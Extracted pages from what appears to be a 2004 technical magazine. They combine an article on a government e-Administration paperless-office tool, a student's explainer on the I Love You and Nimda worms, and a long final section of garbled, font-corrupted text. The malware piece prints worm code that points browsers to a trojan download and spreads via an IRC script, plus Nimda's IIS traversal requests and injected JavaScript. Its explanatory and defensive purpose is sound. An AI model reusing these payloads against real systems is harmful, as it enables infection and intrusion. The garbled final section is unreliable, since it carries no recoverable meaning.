The tool simplifies the process of generatingfiles and enables moving note sheetselectronically for approval Instead of physicallycarrying note sheets for approval from table totable the employees began using the tool Receiptof the e-document was indicated by pop-up alertmessages on the officers monitors

All letters received from external agenciescould now be scanned and converted intoelectronic documents which would then beadded to the central repository This systemenables a user to check the status of a file at anystage More importantly delays are minimisedas the files can be traced instantly through thenetwork employees can now know whichofficer has kept the file pending

The biggest advantage of e-Administration is that it enables us to view atany stage the status of pending file The detailsare available on a central server and can beaccessed by anyone having the authority Thisway workflow is simplified

LL2Bs e-Administration tool not onlyeffects a dramatic reduction of stationary usageand time taken to process documents it alsoserves to introduce transparency in the workingof any organisation

The employees of ELCOT also took to thesystem rather well According to AppuswamyOur employees became more and morecomfortable with using the tool as the trialsprogressed Its quite user-friendly and doesnt

require a lot of technical expertise I myself beganusing the system without any formal trainingand have been using it successfully for eightmonths now

AccoladesAt the 7th National e-Gov conference held

in Chennai in November 2003 MD ELCOTreceived a merit citation award from Governmentof India for implementation of e-Administration as a tool for e-Governance

The Industrial Guidance Bureau of theGovernment of Pondicherry has implementedan integrated e-Platform a quickly customizedsolution of e-Administration to automate theactivities of the Department of Industries andCommerce (Refer Budget 2004-2005 Addressof HE the Lt Governor Pondicherry httpwwwp on nic inopend eptsf in anc elgspeech2004pdf)

Item 7 of the speech reads as followsRemoval of poverty may not be

practically possible without focusing specialattention on creation of gainful jobopportunities The Tenth plan at the nationallevel envisages creation of 50 million newemployment opportunities over a period of fiveyears Therefore focused attention will be givento few critical sectors such as

Industries Information Technology etcwhich have very high employment potential

Item 19 of the speech reads as followsThe manufacturing sector of the economy

has potential to absorb the surplus labour forceThe labour intensive manufacturing units canprovide gainful job opportunities for skilled aswell as semi-skilled labour force We willcontinue to encourage new entrepreneurs tochoose Pondicherry as their destination for

OITS-2004

35

establishing new industrial units andprocedures will be simplified to obtain licence permission to start units We will continue topursue the policies of promoting pollution freeless water and less power consuming industriesin our Union Territory

Item 20 of the speech reads as followsIndustrial Guidance Bureau with

integrated e-Platform has been established bysubstituting single window clearance system tospeed up the process of industrial clearance permission for setting up of new industrial unitsA total of 21 Departments includingMunicipalities Commune Panchayats havebeen integrated with a dedicated electronicnetwork for granting permission to set up anindustry and also to commence production

This saves a lot of time effort and cost toindustrialists and citizens as well as officials ofvarious Departments As against submitting 10copies of documents in the manual system inthe electronic system only one signed copy needsto be submitted thereby saving 90 of paperresulting in conserving of natural forestresources

A unique initiative being attempted for thefirst time in India 21 Departments includingmunicipalities and Panchayats are connectedon a simple dial-up The central repository serverwill be located at the District Industries CentrePondicherry This will form a dedicatedelectronic network The network will allow theGovernment to grant permission for example toset up an industry it can also help amanufacturing unit obtain a Licence tocommence production etc

Says Krishnan This would save a lot oftime effort and cost to industrialists and citizensas well as officials of various Departments As

opposed to submitting 10 copies of documentsin the manual system in the electronic systemonly one signed copy needs to be submittedthereby helping save paper It can help to fuelinvestment in the State and generateemployment for local people

Such an integrated e-Platform can be usedby the ministries and Undertakings of theCentral Government as well as various StateGovernments where ever multiple agencies areinvolved in scrutinizing applications andgranting time bound clearances for planapproval building constructions setting-upindustries etc It can bring about the muchdesired transparency and accountability

Various Central and State GovernmentDepartments and Undertakings including theAndhra Pradesh Technology Services theGovernments of West Bengal Orissa ManipurGoa etc State Bank of India the CanadianConsulate in Chennai British Trade Office(Bangalore) Ministry of Industrial DevelopmentMalaysia and the State of Sarawak Malaysiahave shown interest in e-Administration aweb enabled solution developed using opensource This can considerably cut down thebudget expenditure for e-Governance accordingto Krishnan

Instead of resting on their laurels LL2Bplans to reach out to the various GovernmentDepartments and Undertakings as well asCorporates SMEs and NGOs by implementingtheir solutions in as many public and privateorganisations as possible in India and thedeveloping world by offering the basic solutionfree and charging only for the customisationinstallation training hand holding annualmaintenance and upgrade support eitherdirectly or through ELCOT with whom LL2Bhas a marketing tie-up This is expected to benefit

OITS-2004

36

vastly Governments in India and the developingworld by saving on e-Governance expenditureWe are currently holding discussions with theChennai Metropolitan Development Authority(CMDA) and The Tamil Nadu Dr MGRMedical University to implement e-Administration in their offices institutionsacross the city says Krishnan

Shri D Jayakumar the Hon Minister forIT Govt of Tamil Nadu had stated in the StateAssembly

The Government has also decided to takeup development of four generic softwares paperless office electronic delivery of servicesdevelopment of government portal andintegrated district information system

Of these the paperless office was alreadyin place in ELCOT

While its naiumlve to believe that e-Administration paperless office solutions likeLL2Bs may just be the panacea for our red-taperidden bureaucracy it certainly is a step in theright direction one small step for e-governance a giant leap for democracy

Why ELCOT took the plunge

1 The number of major departments 42 The average number of files generated per

department per year 1503 The average number of physical

movements per file 204 The average number of cycles per file from

start to end 8The total number of manual entries file

movement from desk-to-desk per year4x150x20x8 = 96000 manual entries or filemovements per year

The workload is not evenly distributed asit depends on a hierarchy for granting sanctionandor approval of files The Managing Director(MD) typically has to view and approveapproximately 200 files per week That is anaverage of 40 files per working day This is apartfrom the various meetings he has to attend Filespile up when he is on tour and he is forced tocarry work home When the officer is away filesare kept pending The officer may not even knowthat there are files pending even if they are urgentThese problems cause inordinate delays in theworkflow process A tool such as e-Administration ensures prompt disposal of filesand access to a central database where the statusof files can be monitored at every stage thusensuring efficiency and transparency

Sudeep Jain MD ELCOT confirms thatwhile average cycle time for file approval wasearlier 15 to 21 days after the implementationof the electronic system it was brought down to5 to 7 days

Source E-ADMINISTRATION THE KEY FOR E-GOVERNANCE - INITIATIVES FORCREATING A PAPERLESS OFFICE bySudeep Jain IAS Managing Director ELCOTChennai-35 presented at the 7th National e-Gov Conference in Nov 2003 conducted by theDepartment of Administrative Reforms andPublic Grievances Ministry of PersonnelPublic Grievances and Pension Govt of India

Further enquiries on e-Administration or onimplementing e-Governance Corporate Governancemay be addressed to Mr Krishnan at krisdevgamilcom

OITS-2004

37

Intruders who access networks and systems without authorization or inside attackers withmalicious motives can plant various types of programs to cause damage to the network Theseprograms often lumped together under the general term viruses although other varieties have costcompanies and individuals billions of dollars in lost data lost productivity and the time andexpense of recovery Some of the more destructive examples of malicious code also sometimesreferred to as malware [MALicious softWARE - mark the uppercase MALWARE] over the pastdecade are CIHChernobyl Melissa Code Red Nimda Klez

Now Im going to explain about the two most popular malwares - some exploits which thesemalwares used but NOT how the whole code worked or how to code a malware to exploit

I Love You Worm

The I Love You virus is a little more bulky so I chose not to include the entire script here Youcan download all of the I Love You source from httpwwwpacketstormsecurityorgviral-dblove-letter-sourcetxt

What is interesting to note about the I Love You virus is that it randomly changed the usersdefault Web browser homepage to one of four locations as seen here by the code

num = Int((4 Rnd) + 1)if num = 1 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~young1sHJKhjnwerhjkxcvytwertnMTF wetrdsfmhPnjw6587345gvsdf7679njbvYTWIN-BUGSFIXexe

elseif num = 2 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~angelcatskladjflfdjghKJnwetryDGF ikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4wWIN-BUGSFIXexe

elseif num = 3 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~koichijf6TRjkcbGRpGqaq198vbFV5hfFE kbopBdQZnmPOhfgER67b3VbvgWIN-BUGSFIXexe

elseif num = 4 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~chusdgfhjksdfjklNBmnfgkKLHjkqwtuHJB hAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234 iuy7thjgWIN-BUGSFIXexe

end ifend if

Known Malware ExploitationAbhishek Bhuyan

KIIT Student

OITS-2004

38

The WIN-BUGSFIXexe turned out to be a Trojan application designed to steal passwordsNow a quick look notices all of the URLs present are on wwwskyinetnet This resulted in manyplaces simply blocking access to that single host While bad for skyinetnet it was an easy fix foradministrators Imagine if the virus creator has used more popular hosting sites such as the membershomepages of aolcom or even made reference to large sites such as yahoocom and hotmailcom would administrators rush to block those sites as well Perhaps not Also had someone at skyinetnetbeen smart they would have replaced the Trojan WIN-BUGSFIXexe with an application that woulddisinfect the system of the I Love You virus That is if administrators allowed infected machinesto download the Trojaned Trojan

I Love You also modifies the configuration files for mIRC a popular Windows IRC chat clientif (s=mirc32exe) or (s=mlink32exe) or (s=mircini) or(s=scriptini) or (s=mirchlp) thenset scriptini=fsoCreateTextFile(folderspecampscriptini)

scriptiniWriteLine [script]scriptiniWriteLine mIRC ScriptscriptiniWriteLine Please dont edit this script mIRC will corrupt if mIRC willscriptiniWriteLine corrupt WINDOWS will affect and will not run correctly thanksscriptiniWriteLine scriptiniWriteLine Khaled Mardam-BeyscriptiniWriteLine httpwwwmirccomscriptiniWriteLine scriptiniWriteLine n0=on 1JOINscriptiniWriteLine n1= if ( $nick == $me ) halt scriptiniWriteLine n2= dcc send $nick ampdirsystemampLOVE-LETTER-FOR-YOUHTMscriptiniWriteLine n3=scriptinicloseHere we see I Love You making a change that would cause the users IRC client to send a copy

of the I Love You virus to every person who joins a channel that the user is in Of course the filenamehas to be enticing to the users joining the channel so they are tempted into opening the file- Nimda Worm -

In September 2001 a very nasty worm reared its ugly head The Nimda (Just reverse nimdaand you get admin) worm also called the Concept viruswas another worm which propagated viaMicrosoft hostsNimda featured multiple methods to infect a host

It could send itself via e-mail It would attach itself as an encoded exe file but would use anaudiox-wave Multipurpose Internet Mail Extensions (MIME) type which triggered a bug in InternetExplorer to automatically execute the attachment upon previewing the e-mail Once the attachmentwas executed the worm would send itself to people in the users address book as well as e-mailaddresses found on Web pages in Internet Explorers Web page cachethat means the worm wouldactually find e-mail addresses on recently browsed Web pages The worm would scan for vulnerableIIS machines looking for the rootexe files left over from the Code Red II and Sadmind worms aswell as using various Unicode and double-encoding URL tricks in order to execute commands onthe serverThe following is a list of requests made by the worm

GET scriptsrootexec+dir

OITS-2004

39

GET cwinntsystem32cmdexec+dirGET dwinntsystem32cmdexec+dirGET MSADCrootexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scriptsxc1x1cwinntsystem32cmdexec+dirGET scriptsxc0winntsystem32cmdexec+dirGET scriptsxc0xafwinntsystem32cmdexec+dirGET scriptsxc1x9cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scripts2fwinntsystem32cmdexec+dirGET _vti_bin5c5c5cwinntsystem32cmdexec+dirGET _mem_bin5c5c5cwinntsystem32cmdexec+dirGET msadc5c5c5cxc1x1cxc1x1cxc1x1cwinntsystem32

cmdexec+dirOnce the worm found a vulnerable IIS server it would attempt to Trivial File Transfer Protocol

(TFTP) the worm code to the target server It would also modify the IIS server by creating a guestaccount and adding it to the Administrators group It would also create a Windows share of theC drive (using the name C$)

All local hypertext markup language (HTML) and Application Service Provider (ASP) fileswould be modified to include the following code snippet

ltscript language=JavaScriptgtwindowopen(readmeeml null resizable=notop=6000left=6000)ltscriptgtIn addition the worm would copy itself to the readmeeml file The final result was that

unsuspecting Web surfers would automatically download and possibly execute the worm froman infected Web site

The worm copies itself into EML and NWS in various local and network directories If anunsuspecting user uses Windows Explorer to browse a directory containing these files it is possiblethat the automatic preview function of Explorer would automatically execute the worm This wouldallow the worm to propagate over file shares on a local network

The worm also copies itself to richeddll which is an attempt to Trojan Microsoft Officedocuments since documents opened in the same directory as the richeddll binary will load andexecute the Trojan DLL

The end result was a noisy but very effective worm It was noisy because it created many EMLand NWS files on the local system It also modified Web pages on the Web site which made it easyto remotely detect a compromised server But the multi-infection methods proved quite effective andmany people who had run through and removed the worm had found that their systems keptgetting infectedit is a tough worm to fully eradicate To properly combat it the securityadministrator needed to patch their IIS server upgrade their Microsoft Outlook client and be cautiousof browsing network shares Full information on the Nimda worm is available in the Security Focusanalysis

httparissecurityfocuscomalertsnimda010921-Analysis-Nimda-v2pdf

OITS-2004

40

Some tips on prevention and responseProtecting systems and networks from the damage caused by Trojan horses viruses and

worms is mostly a matter of common sense Practices that can help prevent infection include thefollowing Do not run executable (EXE) files from unknown sources including those attached to an e-

mail or downloaded from web sites Turn off the Preview andor HTML mail options in the e-mail client program Do not open Microsoft Office documents from unknown sources without first disabling

macros Be careful about using diskettes that have been used in other computers Install and use firewall software Install antivirus software configuring it to run scans automatically at predefined times and

updating the definition files regularly Use intrusion prevention tools called behavior blockers that deny programs the ability to

execute operations that have not been explicitly permitted Use integrity checker software (such as Tripwire) to scan the system for changes Recognizing the presence of a malicious code is the first-response step if a system gets infected

Administrators and users need to be on the alert for common indications that a virus mightbe present such as the followingMissing files or programsUnexplained changes to the systems configurationUnexpected and unexplained displays messages or soundsNew files or programs that suddenly appear with no explanationMemory leaks (less available system memory than normal)Unexplained use of disk spaceAny other odd or unexplained behavior of programs or the operating system

- If a virus is suspected a good antivirus program should be installed and run to scan thesystem for viruses and attempt to remove or quarantine any that are found Finally allmission-critical or irreplaceable data should be backed up on a regular basis in case all thesemeasures fail

Virus writers are a creative and persistent bunch and will continue to come up with new waysto do the impossible so computer users should never assume that any particular file type or OSis immune to malicious code The only sure way to protect against viruses is to power down thecomputer and leave it turned off -)

Information about specific viruses and instructions on how to clean an infected system isavailable at httpwwwsymanteccom and httpwwwmcafeecom Both antivirus vendorsprovide detailed databases that list and describe known viruses But I recommend being touch withthe site httpwwwsecuritynewsportalcom here you will get hourly updates about latest securityhacking virus and trojan news

luckylucky-webnethttpwwwlucky-webnet

Orissa Network Security Group httpgroupsyahoocomgrouporissa-netsec

OITS-2004

41

LOtilde`EcircOcircVethornethorn S_ecirc J aTHORNLETHhOgraveSOcircETH[THORN eamp_ OgravekthornETH[ETH

LTHORNVccedil XTHORNcccedilXccedil aTHORNhegraveaTHORN]OcircETHfmacrAElig bEcircthornaOgrave_hegraveethorn

ASTHORNLETHmTHORNthorn LfETH aTHORNsETH_ aETHZTHORNSOcirc ethornETHS_Ntilde[THORNHaOtilde agrave_Ntilde[THORN A]THORN jcordfAElig Ogravel[oumlOgraveethorn LOtilde`EcircOcircVeethornthornakEcircthornf aOcircakthornETHethorn OgravekthornDRTHORNfrac14frac14ETH Ograve[ZEcirc HkTHORNthorn dsectAEligVTHORNaTHORNimacrAEligOgraveethorn LTHORNRTHORN SETHZTHORNaETH Acethorn jETHcETHSTHORNL LragravethornaOcircfrac14frac14ETHd]THORNJ LOtilde`EcircOcircVethorn aTHORNsETH_ HL A^Ecirc_THORNL aTHORN]OcircETHbthornETHaOgraveethorn `eTHORNthornNZTHORN[ HkthornETH `EcircethornETH[_ dEcircNeEcircthorn aTHORNhegraveethornjcordfAElig aTHORN]OcircETHOgraveethorn Aacutecurren akEcircthornOgrave[ D`OgravedETHN OgravekthornETHBAjEcircRTHORNfrac14frac14ETH HL]ETH SOgraveZ XETHbrvbarAEligethorn SOgraveZ LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL HaOtilde jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14 c^OcircOgraveethorn aTHORNaETH]mthornETHNTHORNmthornETHfrac14frac14ETH XETHbrvbarAEligethorn dEcircbrvbarTHORNAEligLOgravemthorn bthornNaETH_ccedil A]ETHcccedilEcircfrac14NYIumlTHORNOgravemthornfrac14frac14ETH Bbccedilthorn OgraveplusmnAEligETH`QETHethorn cETH^OcirccOgraveethorn A]ETHcccedilfrac14NbagravethorneEcircthorn AaTHORNbagravethornETHa OgravekthornOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn joacutefrac12THORNcurrenaYIumlTHORNQETHmTHORNthornmthornETHfrac14frac14ETH Ograve[ZEcirc XETHbrvbarAEligethornNtilde aTHORN]OcircETH kUacutethorn jaagrave EcircethornETH[_frac14frac14ETHHkthornETH hEcircZTHORN jTHORNbTHORNthornmccedilthorn dsectAEligNtilde LkTHORNthornOgravemthorn _UumlETH _UumlETH bthornNaETH_ccedil`otildeOgravec jegraveNagraveLEcirc _THORNcagraveETHZ LOgravemthornfrac14frac14ETH HkthornETH`Ograveethorn `oacuteTHORNaNtildejoacutefrac12THORNcurren OgravekthornmthornETHfrac14frac14ETH OgravejTHORN ETHBUuml jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14ethornAahOcircL[ETH OgravekthornETHBTHORNmthornETHfrac14frac14ETH Ograve[ZEcirc jTHORNbTHORNthornmccedilthorn BampTHORNfrac14_THORN AEligeTHORNOtildethornOgravekthornDRTHORN jaagrave EcircethornETH[_ aTHORN]OcircETHfrac14frac14ETH jaEcirc hEcircZTHORN LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL Aacutecurren kthornjTHORN Drthornethorn Ograve]Ogravemthorn A`ZcETHOgrave_`otildeOgrave[OcircL aTHORN]OcircETHLEcirc HL _THORN~Ugravefrac12curren LotildecOgraveethorn `otildeLETHhLeEcircthornRlaquoTHORNAEligAEligfrac14frac14ETH agraveETH[ccedil HL LETHdagraveOcirc jeTHORNthornaETH `Ograveethorn ]eacuteTHORN[NtildemacrAEligLETHdagraveOcirc LeTHORNthornaETHethorn `w[THORN OgraveLDUuml aTHORN]OcircETHOgraveethorn ethornkTHORNthornRTHORN HkthornETH hEcircZTHORNaETH`Ograveethorn XETHbrvbarAEligethorn HaOtilde jTHORNbTHORNthornmccedilthorn BOtildeSTHORN_THORN AEligethornordfAElig AEligAElig OgravekthornETHB dETHBTHORNOgravemthornfrac14frac14ETH HkthornETHkUacutethorn LOtilde`EcircOcircVethorn aTHORN]OcircETHethorncEumlfcsectAEligfrac14frac14ETH LOtilde`EcircOcircVethornethorn aTHORNaragravethorn_LEcirc _Ecirc OcircETH_ LOgravemthorn

AOgravecdividecETHOgrave_ SETHZTHORN ETHeTHORNthornaETH Ograved A^Ecirc_THORNL LOtilde`EcircOcircVethornethornS_L OgravekthornDRlaquoTHORNAEligAElig QETHmccedilthornjagrave aOcircETHOgraveaSccedilfrac14frac14ETH Ogravej 1834cjTHORNkthornETHOgraveethorn A_ETHmTHORNthornVTHORNLETHmccedilthorn BampTHORNfrac14_ccedil _ETHcLLOtilde`EcircOcircVethornVTHORNH DiexclthornETHa_ LeTHORNthornBOgravemthornfrac14frac14ETH `Ograveethorn `OgraveethornS_ccedil bTHORNthorn_THORNOgravejAtildeccedilcurren AVETH_ETHj$ccedilfrac14 HaOtilde LiacuteTHORNOgrave$frac14ETHXagraveIuml OgraveaeTHORNthorncTHORNhTHORN ABgETH Ogravefrac12currenVccedil macrEcircAElig_THORNbthornethornjTHORNVTHORNOgraveethorn `otildecBOgravemthornOgraveIacuteAEligETH_THORNLccediljccedil (Electronics) LOtilde`EcircOcircVethorn[THORNAeTHORNthorn LeTHORNthornTHORNOgravemthornfrac14frac14ETH HkTHORNthornWETHOgraveethorn kUacutethorn $frac14ETHfrac12currenOgraveSOgrave_Ograveethornj_ccedil (First Generation)LOtilde`EcircOcircVethornethorn S_ecirc OgravekthornETHBTHORNmthornETHfrac14frac14ETH ]eacuteTHORN[NtildemacrAElig aTHORNhegravedEcircwjcmacrAEligOgraveethorn H_THORNALccedil (ENIAC) LOtilde`EcircOcircVethorn _THORNcUgrave[OgravekthornETHBTHORNmthornETHfrac14frac14ETH 1946 cjTHORNkthornETHOgraveethorn _THORNcUgrave[ HkTHORNthornLOtilde`EcircOcircVethornLEcirc ethornMTHORNaETH `ETHBUuml 50 $Ecircfrac14Vccedil x 30 $Ecircfrac14VccedilOethornethorn AahOcircL[ETH OgravekthornETHBTHORNmthornETH HaOtilde HkthornETHethorn JS_THORNmthornETH 30 V_ccedilfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornOgraveethorn 18000bthornOcircETHLEcirccccedil VEcircOcircaccedil (Vaccum tube) mthornETHNTHORNTHORNmthornETHfrac14frac14ETHHkthornETH HL OgravejOgraveLumlAEligOgraveethorn 5000 `dagraveOcirclaquoAElig cTHORNhETHZ(Addition) LeTHORNthorn `ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETH c_EcirciOcircWETHeEcircthorn[OcirclaquoAEligAElig lTHORN otilde THORNmthornETHfrac14 j[ cETH[ouml aragravethorncETH_ethornLOtilde`EcircOcircVethornWETHeEcircthorn dOgravefrac12curren cxethorn THORNmthornETHfrac14frac14ETH `Ograveethorn `Ograveethorn1948 cjTHORNkthornETHOgraveethorn HLVagrave HaOtilde cOcircETHLccedilOgravemthorn cTHORNhTHORNHXccedilbthornETHLccedil (EDVAC) _ETHcL HL D_iuml[cETH_ethornLOtilde`EcircOcircVethornVTHORNH Ograve`_ccediljTHORNmccedilthornbthornETH_THORNAUuml aTHORNhegraveaTHORN]OcircETHfmacrAEligOgraveethornDiexclthornETHa_ LOgravemthornfrac14frac14ETH 1951Ograveethorn ]EcircOgravekthornUuml cTHORNhTHORN Ogravej_ccediljjccedilaEcircOcircOgraveethornETH (Census beaureau)Ograveethorn aOcircakthornETHethorn

OITS-2004

42

`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ [`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

